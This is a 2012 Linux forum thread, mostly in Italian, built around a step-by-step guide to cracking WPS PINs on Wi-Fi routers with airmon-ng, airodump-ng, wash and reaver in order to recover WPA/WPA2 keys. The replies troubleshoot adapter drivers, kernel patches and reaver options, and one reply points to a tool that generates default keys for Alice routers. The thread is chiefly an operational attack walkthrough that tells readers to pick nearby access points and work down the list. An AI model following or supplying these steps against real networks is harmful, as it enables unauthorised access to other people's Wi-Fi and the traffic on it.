How to crack the WPS on routers

Started by ultra_lazer, January 09, 2012, 08:39:01 AM

Previous topic - Next topic

ultra_lazer

HISTORY LESSON
WPS (Wifi Protected Setup) is a feature created in 2007 to make Wifi Protected Networking easy for the average user while making it secure. However due to a design flaw in the authentication for the PIN for the device, this has allowed the ability to Crack the PIN on a WPS enabled AP. This has nothing to do with cracking the WPA/WPA2 PSK, although it will be obtained with this method.

The PIN is broken down as 11112223 (Example for explanation only and not to be taken literally)
The 1111 is the first half of the PIN. The 222 is the second half of the PIN. The 3 is a checksum of the entire PIN (first 7 digits). Reaver must first obtain the first half of the PIN (1111) before it can go on to the second half (222). When reaver is running you will notice 1111 changes 222 remains same and 3 changes, until it obtains the first half of the PIN. Then the 1111 remains same, 222 and 3 changes as it obtains the second half of the PIN.

Tools needed
Backbox Linux ( any version )
Reaver https://code.google.com/p/reaver-wps/dow...=-filename
A compatible Wifi Adapter (research your preference ie; AWUS036H)
NB: Reaver will only run on linux and why Backbox is recommended.

With Backbox Running download Reaver
extract and install reaver as follows from Terminal:
tar xvfz reaver1.xxxx (xxxx being the release number which will change with updates)
cd reaver1.xxx
cd /src/
./configure
make
make install


Assuming no errors lets continue
Open a fresh terminal and let get the adapter running in promiscuous mode and type the following

airmon-ng (this will list your wifi adapters, most common is wlan0)
airmon-ng start wlan0 (replace wlan0 with the one you get listed)
you should receive output that tells you which Interface is in Monitor Mode. Most commonly mon0

Now in the same terminal lets see who is around and type the following:
airodump-ng --encrypt wpa mon0 (this will display only WPA/WPA2 encrypted networks. Let it run for 30 sec or so till you see all AP's that you can. Hit CTRL+C

AP's should be listed by power so you want to start with the top ones and work your way down the list. But wait.. how do I know if WPS is enabled. Glad you asked.

Open a new terminal and type the following:
walsh -i mon0 (replace mon0 as noted above. This will scan for all WPS enabled AP's in range and remove the guess work and compare it to the airodump-ng output and pick out the highest powered AP first.)

Now we are ready to start. Go back to the Terminal that you installed reaver with and type the following:

reaver -i mon0 -b BSSID -S -vv (Change mon0 as noted previously. BSSID is the MAC address of the AP. You can use the MAC from the walsh output or the airodump-ng output as they will be the same. The -S switch reduces the packet size sent to the AP and thereby decreases the attack time. The -vv switch will display all errors and PIN's tested.)

Now just let it run.

THINGS TO NOTE:
You may see the percentage in reaver output go from 2% to 90% just like that. This is normal when it finds the first half of the PIN. This is also why you will notice the second half of the PIN as noted above as 222 remains constant before it finds the first half.

Errors are a common thing to see and caused by many variables.
WARNING: Receive timeout occurred
WARNING: 10 failed connections in a row
WARNING: Out of order packet received, re-trasmitting last message
Just let it run.

If I forgot something I will add it in or attempt to explain in better detail. Hope this helps.

U_LZ

raffaele

reaver is now on BackBox repository ;)

sudo apt-get update
sudo apt-get install reaver
raffaele@backbox:~$ Get root or die tryin'

kignho

#2
ciao in questi giorni mi sono cimentato reaver con scarsi risulatati per non dire pessimi,ho testato il mio router di alice,dove dietro ce un piccolo tasto con la scritta reg,ma sia se premo o non premo il pulsante mi da questo risultato:

Waiting for beacon from 38:2*:9D:**:79:7*
  • Switching mon0 to channel 1
  • Associated with 36:2*:9D:**:79:7* (ESSID: Alice-6*7**605)
  • Trying pin 12345670
  • Switching mon0 to channel 2
  • Switching mon0 to channel 1
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response

    lo lasciato a lavoro per piu' di una giornata ma il risultato non e' cambiato

    questo me lo da su sitecom:

    Waiting for beacon from 00:0C:*6:**:A2:6*
  • Switching mon0 to channel 1
  • Switching mon0 to channel 9
  • Associated with 00:0C:*6:69:**:6* (ESSID: Sitecom6*A*6C)
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
    [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin

    e ripete sempre la stessa schermata

    con il software wash  ho visto i router con wps attivo, tre compreso il mio,quello di mio cugino (sitecom) e di mio fratello(alice)e bene su quello di mio fratello stesso risultato del mio come da tabella,su quello di mio cugino sembra funzionare ma mi da sempre lo stesso pin(pin 12345670)quindi non riesce a craccare, questo sia con backbox che con un altra  distro,ora mio cugino mi ha dato il pin,quindi appena ho un po' di tempo provero a provare reader con il pin,dimenticavo la mia scheda e' un alfa 036H mi potreste dare qualche delucidazione considerando che sono un niubo...grazie

ultra_lazer

#3
Ciao

Allora, io ti posso rispondere solo per " mia " esperienza !
ci sono tanti motivi se reaver non riesce a beccare la wap,wpa2 ecc...
1) il target router non sopporta i continui packets che reaver gli manda, infatti ti da' l'errore " Time-out".
2) la tua wifi card non e' addatta . anche se va in monitor, non produce " raw packets" se ci dici che wifi card hai ! forse possiamo aiutare!
3) troppa distanza tra te e il router o' sei troppo vicino, tocca regolare gli intervalli tra i packets, troppo vicino va' in denial of service, troppo lontano l'injection non va' a buon fine ! se sei troppo vicino, togli il ( -vv ) se sei lontano aggiungi ( -d 0 ) alla fine.
4) se il router va' sempre in time out usa questo ( -vv --dh-small ).

Conclusione,      devi giocarci un po' con gli opzioni di reaver, usa il -help option , e vedrai che ci riesci,  ;) non puoi immaginare quanta soddisfazione quando reaver ti consegna la Wpa/Wpa2 su un piatto d'argento dopo che hai speso giorni cercando di beccarle con il wordlist :D

Auguri.
UL

Ah, dimenticavo, le chiavi Wpa di Alice sono standard, se usi questo tool , la becchi in poco tempo :  http://code.google.com/p/alicekeygen/


kignho

ti ringrazio per la risposta,ho provato a dare le varie opzioni ma il risulatato non cambia avvolte dice di essere assocciato,ma rimane sempre li,cioe' non va avanti,con altre opzioni mi da sempre il solito errore,comunque la mia scheda e' un alfa 036H i driwer sono quelli installati di default su backbox(realtek 8187)presumo.

ultra_lazer

Ecco , adesso capisco !
stai usando i drivers installati su Backbox ! dunque , se hai usato la guida per l'installazione di Compat-wireless che si trova attualmente, allora non funzionera' ! perche facendo l'upgrade a 2.6.39 e installare  Compat-wireless v3.3 non ce' speranza ( l'ho gia' segnalato qui nel forum , ma nessuno sembra di vederlo ! ho messo anche la soluzione qui :  http://forum.backbox.org/software-support/aireplay-and-the-%27channel-1%27-problem/
Ora non so che dire ! io ho cambiato i drivers e tutto funziona, anche io uso Alpha con RTL8187L.
???

kignho

ho seguito questa procedura ma il risultato non cambia,ma visto che con linux sono ancora un po' impacciato...

sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install linux-backports-modules-cw-2.6.39-natty-generic

magari quello che ho fatto e' completamente sbagliato...

ultra_lazer

 :D Lavoro fatto a meta'  :D

ora che hai installato il nuovo kernel 2.6.39, devi installare i wifi drivers compatibili, cosi :

cd/usr/src/
wget http://linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2011-07-14.tar.bz2
tar jxpf compat-wireless-2011-07-14.tar.bz2
wget http://www.backtrack-linux.org/2.6.39.patches.tar
tar xpf 2.6.39.patches.tar
cd compat-wireless-2011-07-14
patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < ../patches/zd1211rw-2.6.28.patch
patch -p1 < ../patches/ipw2200-inject.2.6.36.patch
make
make install


& Fai ripartire il tuo systema e andra' tutto bene  :D

kignho

tu hai una grande pazienza ma io...non sono dei piu' fortunati
quando digito
cd/usr/src/: File o directory non esistente
poi installo tutti gl'altri file e vanno a buon fine tranne
make, e make install, che mi danno degli errori,cavolo pensavo di esserci riuscito

kignho

provato solo con: /usr/src/ e lo trova ma poi quando arrivo a make mi da questo errore anke se digito sudo make

rfc-118@rfc118-System-Product-Name:~/compat-wireless-2011-07-14$ make
/home/rfc-118/compat-wireless-2011-07-14/config.mk:212: "WARNING: CONFIG_CFG80211_WEXT will be deactivated or not working because kernel was compiled with CONFIG_WIRELESS_EXT=n. Tools using wext interface like iwconfig will not work. To activate it build your kernel e.g. with CONFIG_LIBIPW=m."
make -C /lib/modules/2.6.38-13-generic/build M=/home/rfc-118/compat-wireless-2011-07-14 modules
make: *** /lib/modules/2.6.38-13-generic/build: File o directory non esistente.  Arresto.
make: *** [modules] Errore 2
rfc-118@rfc118-System-Product-Name:~/compat-wireless-2011-07-14$ make install
/home/rfc-118/compat-wireless-2011-07-14/config.mk:212: "WARNING: CONFIG_CFG80211_WEXT will be deactivated or not working because kernel was compiled with CONFIG_WIRELESS_EXT=n. Tools using wext interface like iwconfig will not work. To activate it build your kernel e.g. with CONFIG_LIBIPW=m."
FATAL: Could not open /lib/modules/2.6.38-13-generic/modules.dep.temp for writing: Permission denied
make: *** [uninstall] Errore 1
rfc-118@rfc118-System-Product-Name:~/compat-wireless-2011-07-14$ sudo make
[sudo] password for rfc-118:
/home/rfc-118/compat-wireless-2011-07-14/config.mk:212: "WARNING: CONFIG_CFG80211_WEXT will be deactivated or not working because kernel was compiled with CONFIG_WIRELESS_EXT=n. Tools using wext interface like iwconfig will not work. To activate it build your kernel e.g. with CONFIG_LIBIPW=m."
make -C /lib/modules/2.6.38-13-generic/build M=/home/rfc-118/compat-wireless-2011-07-14 modules
make: *** /lib/modules/2.6.38-13-generic/build: File o directory non esistente.  Arresto.
make: *** [modules] Errore 2

ultra_lazer

 :D non preoccuparti, hai 2 errori ,

1)  non hai installato il nuovo kernel 2.6.39 correttamente, infatti figura ancora 2.6.38 !
2) non hai usato il superuser durante l'installazione ( sudo ) per questo ti da' " Permission denied " !

Non ti avvilire, questo e' linux, ma solo cosi si impara ! Sbagliando !!!

Ora , installa il kernel 2.6.39 con tutti i suoi componenti , usa synaptic se non riesci dal terminal, fai ripartire il pc, poi torna a synaptic e disinstalla il vecchio 2.6.38, fai ripartire di nuovo.
rienstalla i wifi drivers usando sempre " sudo ".

Buona fortuna  ;)

kignho

allora non posso installare il kernel  2.6.39 da synaptic perche non lo trovo ce solo la 2.6.38,anche se metto il sudo non cambia niente (lo avevo gia messo la prima volta)riprovato ma nulla,dopo aver fatto:sudo apt-get update e sudo apt-get dist-upgrade,do questo comando:sudo apt-get update
sudo apt-get dist-upgrade e mi da questa risposta:
sudo apt-get install linux-backports-modules-cw-2.6.39-natty-generic-pae
[sudo] password for rfc-118:
Lettura elenco dei pacchetti... Fatto
Generazione albero delle dipendenze       
Lettura informazioni sullo stato... Fatto
E: Impossibile trovare il pacchetto linux-backports-modules-cw-2.6.39-natty-generic-pae
E: Impossibile trovare alcun pacchetto tramite l'espressione regolare "linux-backports-modules-cw-2.6.39-natty-generic-pae"
rfc-118@rfc118-System-Product-Name:~$

invece in questo modo sembra accettare:

sudo apt-get install linux-backports-modules-cw-2.6.39-natty-generic
Lettura elenco dei pacchetti... Fatto
Generazione albero delle dipendenze       
Lettura informazioni sullo stato... Fatto
linux-backports-modules-cw-2.6.39-natty-generic è già alla versione più recente.
I seguenti pacchetti sono stati installati automaticamente e non sono più richiesti:
  lib32bz2-1.0 lib32ncurses5 nspluginwrapper ia32-libs lib32gcc1 lib32asound2
  lib32ncursesw5 lib32z1 lib32stdc++6 lib32v4l-0
Usare "apt-get autoremove" per rimuoverli.
0 aggiornati, 0 installati, 0 da rimuovere e 0 non aggiornati.
rfc-118@rfc118-System-Product-Name:~$

quindi non riesco a capire dove sta il problema



kignho

dopo una giornata intera sono riuscito ad installare tutto!sia il kernel che le patch :) :)ma pero reader  ho sempre gli stessi problemi di prima :-[ :-[comunque grazie ultra_lazer ,se posso ricevere altro aiuto bene,altrimenti in qualche modo faro...

ultra_lazer

Ciao
Eppure un giorno di questi saro' eliminato da questo forum  ;D per le cose che dico !!
Torno sempre a rispondere ( secondo la mia esperienza) !! prova ad eliminare Reaver dal tuo pc { suppongo che tu usi il pacchetto Deb di reaver preso da Backbox repository, e installa la versione originale da qui : https://code.google.com/p/reaver-wps/dow...=-filename
Ora non voglio mettere in dubbio l'autenticita' del programma qui, ma io uso la versione presa da Google code e ho preso 3 Wpa/Wpa2 con una wireless card " Bcm43" ora RTL8187 e' molto piu efficace di Broadcome !!! perche io non riesco a spiegarmi come' che non ti riesce a beccare almeno un AP !!!!
Per scaramanzia, te prova, poi se tutto resta lo stesso, allora ti consiglio di farti battezzare da un prete Ricchione  :D
Ps: era solo per tirarti su di morale  :D

Auguri.

kignho

sei grande e mi fai anche ridere il che non guasta.. :)provero a disinstallare e cambiare versione,una cosa prima,quando lancio la scheda in monitor mode:sudo airmon-ng start wlan0, airmon mi risponde che la scheda e in monitor mode(mon0)la cosa strano pero e' che navigo tranquillamente come se nulla fosse,quindi mi tocca attivare( wepcrackgui)e fargli fare una scansione in modo che la scheda vada in monitor mode,poi posso avviare reaver,ma se chiudo ( wepcrackgui)reaver mi risponde che la scheda non e' in monitor mode,puo dipendere dal fatto che ho un altro programma in monitor mode,e che quindi reaver non funzica perfettamente)